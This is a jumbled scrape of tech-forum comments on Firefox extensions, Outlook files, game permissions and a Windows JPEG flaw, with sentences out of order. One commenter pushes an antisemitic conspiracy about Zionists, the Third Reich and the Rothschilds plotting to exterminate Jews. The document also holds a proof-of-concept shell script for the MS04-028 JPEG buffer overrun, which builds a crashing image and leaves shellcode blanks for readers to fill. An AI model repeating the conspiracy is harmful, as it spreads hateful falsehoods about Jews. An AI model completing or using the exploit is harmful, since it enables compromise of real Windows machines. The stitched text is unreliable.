Interestingly, this is not wholly accurate. --It suggests that ALL Jews want to control everything, whereas my experience with Jews tells me that the power-mongers are, as in other nations, a small number of elite. Their supporters are either connected to that elite, or are, largely, programmed masses.
Zionism is masked as a Jewish creation. Zionism, after the history is examined, is clearly a manipulative force which has through many, many means, artificially created threats of all types to Jews in other nations, both direct and indirect, pushing them to re-locate to Israel. There is plenty of evidence of Zionist ties with the Third Reich and various non-Jewish power brokers such as Rothschildes, and of course, the US government.
The end goal, as I have said before, is to "Put all the eggs in one basket" to enable a more effective termination of the Jewish blood lines, and that this is one of the primary objectives to the coming World War.
The Jews are one of the most heavily manipulated groups on the planet, and one which is being herded ever closer toward self-destruction.
I don't see it as being avoidable at this point, but perhaps with continued warnings and muck-raking, some people living in Israel, or who are planning to move there, will wake up and perhaps manage to avoid the hammer before it falls.
-FL
I welcome it! But please, be sure to also review and include the other two or three comments I've made in responses to the others who commented on my post.
--I think it may be very likely that you are jumping to conclusions regarding my intent and beliefs. In any case, I'd be fascinated to know what your teacher's take would be.
-FL
Forcing your customers to run a less secure system as a way of enforcing the 'adult' rating sounds like a dumb idea, oh and by the way I'm feeling cynical, and I'm a developer myself, so I'll just go ahead and say that I'm 99% sure this stuff is total garbage - it's just that they couldn't be bothered to make the games run if you're not admin.
I bet that problem was found in beta-testing for both games, and they decided not to fix it, and cooked up some bollocks about won't somebody please think of the children instead.
It's not due to programming incompetence per se - I'm guessing timescales/perceived small scale of the problem caused it not to be fixed.
Cynical old me :)
See http://www.openwall.com/advisories/OW-002-netscape -jpeg/.
I meant Sirius.
no it has the 2gb limit as well. i dont know where there is a setting to enable some other amount of space.
.pst file thats horribly corrupted (well its actually "fixed" acording to microsoft as Outlook locks the file so that it wont actually corrupt, i can not however delete any messages out of it or anything)
this is due to the 2gb bug that effects most 32bit things (ie its all 1's). i just coincidentally enough, ran across this problem with a user this morning. i am thinking of switching him to thunderbird but there is no calendar and lord knows no one can work without a calendar!
i have a 1.9gb
theres a tool that lobotomizes like 50megs RANDOMLY out of the store file which would presumeably allow you to get in there and delete messages. i havent tried it yet.
(horribly offtopic i know)
I'll just use my special getting high powers one more time...
CSS file for your browser.
" 1"],
For example, to block 1x1 and 0x0 pics and stuff from doubleclick in firefox, add the following CSS stuff into your $MOZILLA/chrome/userContent.css file:
*[width="0"][height="0"],
*[width="1"][height=
*[src*="*.doubleclick.net/*"] {
display: none;
visibility: hidden;
}
I don't think it's a matter of making the format backwards compatible (I'm sure it already is, from 0.7 at least). Pretty sure most extensions are compatible, just that the devs only sanction them up to the current ff/moz version because that's all they've tested on. You could edit the source yourself... Anyhow I agree that it sucks, I lost quite a few useful extension too bugmenot (but I can use the webpage) and quicknote (which really sucks because I used that a lot), and javascript console viewer (which isn't so useful since I'm not using js anymore).
.xpi file and rename it to a zip, extract the install.rdf file and open it with a text editor. There you can edit the maxversion, then put the new install.rdf back in the zip, rename it back to xpi and open with firefox. Of course you use this at your own risk because something *might* have been broken between versions.
If you like you can edit the extension to be compatible, download the
Hopefully now we've hit the 1.0 series the extensions can be made compatible for all 1.x versions.
He who defends everything, defends nothing. -- Fredrick The Great
Proof of concept exploit that creates a jpeg image to test for the buffer overrun vulnerability discovered under Microsoft Windows. Shellcode and valid addresses have been removed. /* CAN-2004-0200 */
#!/bin/sh
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
# sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-
#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"
printf "\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"
# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Other stuff
printf "\x96\x02\x00\x00\x1A\x00\x00\x00"
# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";
# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"
#Comments here
perl -e 'print "A"x1000';
#Image junk here
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\ x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\ x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\ x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\ x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\ x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\ x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\ x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\ x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\ x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\ x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\ x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\ x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\ x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\ x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\ x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\ x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\ x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\ xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\ xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\ xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\ x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00
umm.. isn't college for learning?
...these aren't my real teeth.
I mean that firefox should (within reason) retain your previous plugins when you perform an upgrade..
It may do now.. havent upgraded in a while (since before they had pretty installers and such)..
Of course if you have a plugin that relies on said vulnerability, the plugin no longer runs correctly.. but I think the chances of this are relatively slim..
I've actually been holding off upgrading because I hate trying to find and install all the plugins again (especially the good version of Adblock!!)..
i hate pansy republicans
Gees you guys don't get it when someone is supposed to be funny? But also its not impossible to do this in the real world. There is a security company that does not allow windows machines to connect to its corporate network at all. In the Real world the school can require the students to buy a particular computer. It might be a windows box, an Apple, or linux. I remember a school that required all CS students to have an Amiga!!
Think Deeply.
Right, but how would Firefox know which plug-ins were affected by the vunerablity and which were not? DO the plug-ins only call the Firefox API, or do some of them hav their own API.
For example, one of the extensions I use is Image Zoom. Was this extension affected by the JPEG vunerability? And if yes, will updating Firefox fix the vunerablity in the extension too?
That's a very very interesting question
i hate pansy republicans